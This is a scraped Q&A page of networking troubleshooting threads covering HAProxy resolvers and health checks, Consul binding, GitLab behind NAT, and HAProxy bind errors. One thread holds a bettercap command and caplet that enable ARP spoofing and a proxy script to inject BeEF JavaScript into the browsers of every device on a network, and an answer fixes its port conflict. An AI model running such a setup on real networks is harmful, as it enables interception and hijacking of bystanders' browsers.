As a test, I have a local bind instance running:
>netstat -ant | grep LISTEN
tcp 0 0 10.72.186.23:53 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN
...
>nslookup mysubdomain.example.com 127.0.0.1
Server: 127.0.0.1
Address: 127.0.0.1#53
Name: mysubdomain.example.com
Address: nn.nn.nn.251
Name: mysubdomain.example.com
Address: nn.nn.nn.249
Name: mysubdomain.example.com
Address: nn.nn.nn.201
Name: mysubdomain.example.com
Address: nn.nn.nn.138
I'm running haproxy 1.6.2 on the same host, with a resolvers section:
resolvers dns
nameserver dns1 127.0.0.1:53
nameserver dns2 10.72.186.23:53
hold valid 10s
It doesn't reject the resolvers section, but doesn't seem to be using it, either. It doesn't show in the stats page, and attempting to add this service command:
server mysubdomain-dev mysubdomain.example.com
causes this error:
>service haproxy restart
* Restarting haproxy haproxy
[ALERT] 322/171813 (10166) : parsing [/etc/haproxy/haproxy.cfg:77] : 'server mysubdomain-dev' : invalid address: 'mysubdomain.example.com' in 'mysubdomain.example.com'
[ALERT] 322/165300 (29751) : Error(s) found in configuration file : /etc/haproxy/haproxy.cfg
[ALERT] 322/165300 (29751) : Fatal errors found in configuration.
The haproxy doc https://cbonte.github.io/haproxy-dconv/configuration-1.6.html indicates this should work.
server <name> <address>[:[port]] [param*]
...
<address> is the IPv4 or IPv6 address of the server. Alternatively, a
resolvable hostname is supported, but this name will be resolved
during start-up. Address "0.0.0.0" or "*" has a special meaning.
Is there some other piece that needs to be added to the haproxy.cfg that activates the resolvers section?
When HAProxy first starts, it attempts to resolve the hostnames of any servers in all the backends to fill the server structures. During this first startup phase, HAProxy uses the OS resolver, i.e. generally the servers defined in your /etc/resolv.conf file.
Only later, when the server's IP addresses are updated during checks, HAProxy uses its internal resolver configuration and its internal DNS resolver.
From your error description, it now seems as if your host itself can not resolve the mysubdomain.example.com hostname. HAProxy will only be able to start if it can resolve the hostnames without an explicit named nameserver. This can be verified with e.g.
dig mysubdomain.example.com
might be you are not specifying the resolvers to use for that server
server mysubdomain-dev mysubdomain.example.com ->
server mysubdomain-dev mysubdomain.example.com resolvers dns
Related
I was successfully using Spilo (HA PostgreSQL Cluster with Docker) in Docker Swarm behind HAProxy. I used one of the HAProxy configuration posted by one of the users.
It was working fine for HAProxy 2.1. I updated HAProxy to 2.2 and suddenly it doesn't work anymore. In the announce of HAProxy 2.2 I found that there was some changes for the Health Checks.
This is my backend section of the master that was working before:
backend backend_master
option httpchk OPTIONS /master
server dbnode1 spilo1:5432 maxconn 100 check port 8008 resolvers docker_resolver resolve-prefer ipv4
server dbnode2 spilo2:5432 maxconn 100 check port 8008 resolvers docker_resolver resolve-prefer ipv4
server dbnode3 spilo3:5432 maxconn 100 check port 8008 resolvers docker_resolver resolve-prefer ipv4
After reading HAProxy 2.2 documentation I'm not sure why the current configuration doesn't work anymore.
This is the message from the logs:
Server be-postgres-master/dbnode1 is DOWN, reason: Layer7 invalid response, info: "TCPCHK got an empty response at step 1", check duration: 5ms. 2 active and 0 backup servers left. 0 sessions active, 0 requeued, 0 remaining in queue.
Server be-postgres-master/dbnode2 is DOWN, reason: Layer7 invalid response, info: "TCPCHK got an empty response at step 1", check duration: 4ms. 1 active and 0 backup servers left. 0 sessions active, 0 requeued, 0 remaining in queue.
Server be-postgres-master/dbnode3 is DOWN, reason: Layer7 invalid response, info: "TCPCHK got an empty response at step 1", check duration: 4ms. 0 active and 0 backup servers left. 0 sessions active, 0 requeued, 0 remaining in queue.
[ALERT] 235/144508 (6) : backend 'be-postgres-master' has no server available!
I downgraded HAProxy to 2.1 and it works again but how to make it work with 2.2 ?
Don't know whether you're still struggling with the issue or not, but changing the request method from OPTIONS to GET in the httpchk section helped me.
Whatever port I try to use I keep getting the error:
listen tcp 0.0.0.0:PORT_NUMBER: bind: address already in use
Environment
I also installed this using Brew if you need to know that
Bettercap 2.11.1
Mac OS High-Sierra
golang 1.11.4
Command line code used:
sudo bettercap -eval "set net.probe off; set arp.spoof.targets 0.0.0.0" -caplet beef-active.cap
beef-active.cap:
set http.proxy.script beef-inject.js
set http.proxy.port 8011
set https.proxy.port 8011
http.proxy on
https.proxy on
sleep 1
arp.spoof on
Expected behavior:
I am trying to inject some js into the browser of each computer connected to my router. I except to see a message that the beef-inject was successfully injected
Actual behavior: What actually happened
Stops when it hits my IP address. Here is the output:
[13:26:41] [sys.log] [inf] http.proxy started on 0.0.0.0:8011 (sslstrip disabled)
[13:26:41] [sys.log] [inf] loading proxy certification authority TLS key from /var/root/.bettercap-ca.key.pem
[13:26:41] [sys.log] [inf] loading proxy certification authority TLS certificate from /var/root/.bettercap-ca.cert.pem
[13:26:41] [sys.log] [inf] Enabling forwarding.
[13:26:41] [sys.log] [inf] https.proxy started on 0.0.0.0:8011 (sslstrip disabled)
[13:26:41] [sys.log] [!!!] listen tcp 0.0.0.0:8011: bind: address already in use
edit:
Changing the ports for both to be different stopped the error however it is still not injecting anything into the browsers. All I keep getting in the console is:
ok so I changed that and I am no longer getting that error however, it is still not injecting any JS into the browsers. I just keep getting new and lost endpoints like so:
0.0.0.0/24 > 0.0.0.0 » [08:33:17] [endpoint.new] endpoint 0.0.0.0 detected as 04:18:d6:d0:69:e7 (Apple, Inc.).
0.0.0.0/24 > 0.0.0.0 » [08:33:23] [endpoint.lost] endpoint 0.0.0.0 (Apple, Inc.) lost.
.... Then it keeps ticking through the same messages, new > lost > new > lost
Any ideas?
set http.proxy.port 8011
set https.proxy.port 8011
Those ports are set to the same thing, which means they're both trying to listen on 8011 and are stomping on each other.
Change one of them to a different port and the error should go away.
Cheers!
I'm new at consul and I try to setup a server-client environment. I have started my server with the following command and configuration:
consul.exe agent -ui -config-dir=P:\Consule\config
The config file looks the following ("P:\Consule\config\server.json")
{
"bootstrap": false,
"server": true,
"datacenter": "MyServices",
"data_dir": "P:\\Consule\\data",
"log_level": "INFO"
}
Output when I start consul from commandline with above command:
==> Starting Consul agent...
==> Consul agent running!
Version: 'v0.8.3'
Node ID: '1a244456-e725-44be-0549-33603ea7087d'
Node name: 'MYCOMPUTERNAMEA'
Datacenter: 'myservices'
Server: true (bootstrap: false)
Client Addr: 127.0.0.1 (HTTP: 8500, HTTPS: -1, DNS: 8600)
Cluster Addr: 127.0.0.1 (LAN: 8301, WAN: 8302)
Gossip encrypt: false, RPC-TLS: false, TLS-Incoming: false
Atlas: <disabled>
Now, at another computer in my domain I try to run an consul client with follwoing commandline and config-file:
consul.exe agent -config-dir C:\Consul -bind=127.0.0.1
Config file ("C:\Consul\client.json")
{
"server": false,
"datacenter": "MyServices",
"data_dir": "C:\\TEMP",
"log_level": "INFO",
"start_join": ["MYCOMPUTERNAMEA"]
}
But I always get follwing output/error message:
==> Starting Consul agent...
==> Joining cluster...
==> 1 error(s) occurred:
* Failed to join <IP_OF_MYCOMPUTERNAMEA>: dial tcp <IP_OF_MYCOMPUTERNAMEA>:8301: connectex: No connection could be made because the target machine actively refused it.
Does anyone know what I'm doing wrong?
Thanks and best regards
I suppose, the reason is that your server is available only for 127.0.0.1 ip-address, which is localhost ip and available only from the same server. This can be seen here:
Client Addr: 127.0.0.1 (HTTP: 8500, HTTPS: -1, DNS: 8600)
Cluster Addr: 127.0.0.1 (LAN: 8301, WAN: 8302)
You have to configure your server, to make it listening all network interfaces or some specific interface, which have to be available from other server.
Try to run it with the client and advertise options set to 0.0.0.0 (or some specific ip). Read about it here and here.
And you might have to delete -bind=127.0.0.1 from the client configuration, since it might be available from the server too.
This is a fresh install on Ubuntu 16.04.
I have been able to change the port and edit the "/etc/gitlab/gitlab.rb" file.
changes;
external_url 'http://superawesomedomain.com:2345'
nginx['listen_port'] = 2345
nginx['proxy_set_headers'] = {
"Host" => "$http_host",
"X-Real-IP" => "$remote_addr",
"X-Forwarded-For" => "$proxy_add_x_forwarded_for",
"X-Forwarded-Proto" => "https",
"X-Forwarded-Ssl" => "on"
}
When I try to access Gitlab from the browser, I get a 502 error "Whoops, GitLab is taking too much time to respond."
And this in the logs:
==> /var/log/gitlab/nginx/gitlab_error.log <== 2016/05/04 00:43:53 [error] 1599#0: *14 connect() to
unix:/var/opt/gitlab/gitlab-workhorse/socket failed (111: Connection
refused) while connecting to upstream, client: xxx.xxx.xxx.xxx, server:
superawesomedomain.com, request: "GET /favicon.ico HTTP/1.1", upstream:
"http://unix:/var/opt/gitlab/gitlab-workhorse/socket:/favicon.ico",
host: "superawesomedomain.com:2345", referrer:
"http://superawesomedomain.com:2345/"
The only ports configured behind NAT to work on this machine are; 2345 and 8080.
What am I missing? Ultimately I would prefer that it be https://superawesomedomain.com:2345/
I was able to get this working by using the IP of the server instead of the URL in the config:
external_url 'http://192.168.0.20:2345'
After doing that, GitLab was accessible from the //superawesomedomain.com:2345/ address. I am not sure why this worked, but it seems this is the only way to get it working with NAT and forwarded ports.
service haproxy start
* Starting haproxy haproxy
[ALERT] 299/163851 (6382) : Starting proxy 50.112.164.38:80: cannot bind socket
[ALERT] 299/163851 (6382) : Starting proxy 50.112.164.38:443: cannot bind socket
The issue is that there is no listen port in the configuration. use "listen" or "bind" and then restart it. It should work. If you still having trouble show the code over here and I will look into it
Safi